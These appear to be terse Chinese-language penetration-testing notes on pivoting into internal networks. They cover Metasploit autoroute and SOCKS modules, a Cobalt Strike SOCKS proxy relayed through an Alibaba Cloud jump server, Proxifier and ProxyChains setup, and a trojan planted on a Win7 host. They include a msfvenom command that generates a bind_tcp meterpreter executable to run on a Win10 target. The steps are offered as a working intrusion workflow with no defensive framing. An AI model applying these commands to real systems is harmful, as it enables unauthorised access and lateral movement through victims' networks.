控制之前需要得到权限----网络通讯是正常的(忽略怎么拿到的权限)
四台主机 :
代理软件:sockscap proxifier前两个windos,ProxyChains(linux)
步骤:添加路由,创建节点,软件连接节点,在软件服务器进行后续渗透
MSF:
第一台:环境为 :本地有文件管理网站
本地只有一个网段出网 利用此网段 让 阿里云的msf服务器上线,在msf上使用了端口转发
同时在另外一台windows服务器上 使用了隧道代理工具连接到阿里云的msf服务器,相当于阿里云msf充当了跳板
操作:
1、添加路由
run autoroute -p
run post/multi/manage/autoroute
2、sock代理 全局应用
use expxxxx
set srvhost 0.0.0.0
set srvport 115
run
启动代理软件配置sock5代理
CS:
木马上传到有网的win7,然后让他通讯win10
操作:不需要添加路由,在cs客户端上可以一键添加(代理转发-socks代理)
代理工具使用 proxifier:
在代理工具上添加了 cs的阿里云服务端 -上线服务器
原理:攻击机(代理工具运行机)--代理到cs阿里云开放的口子上--cs阿里云服务端(开放了端口)----指定了win7----win10与win7同属一个内网,可以相互访问
Msf:正向连接
生成一个绑定了本地ip为127.0.0.1的木马,在win10上执行
msfvenom -p windows/meterpreter/bind_tcp LHOST=0.0.0.0 LPORT=3333 -f exe > bd.exe
在msf(阿里云机)中设置payload 和rhost为192.168.11.129
win2008:
cs:在攻击机中使用proxifier代理目标主机指向阿里云主机(47.xxxx)
msf:添加路由地址--使得有22网段的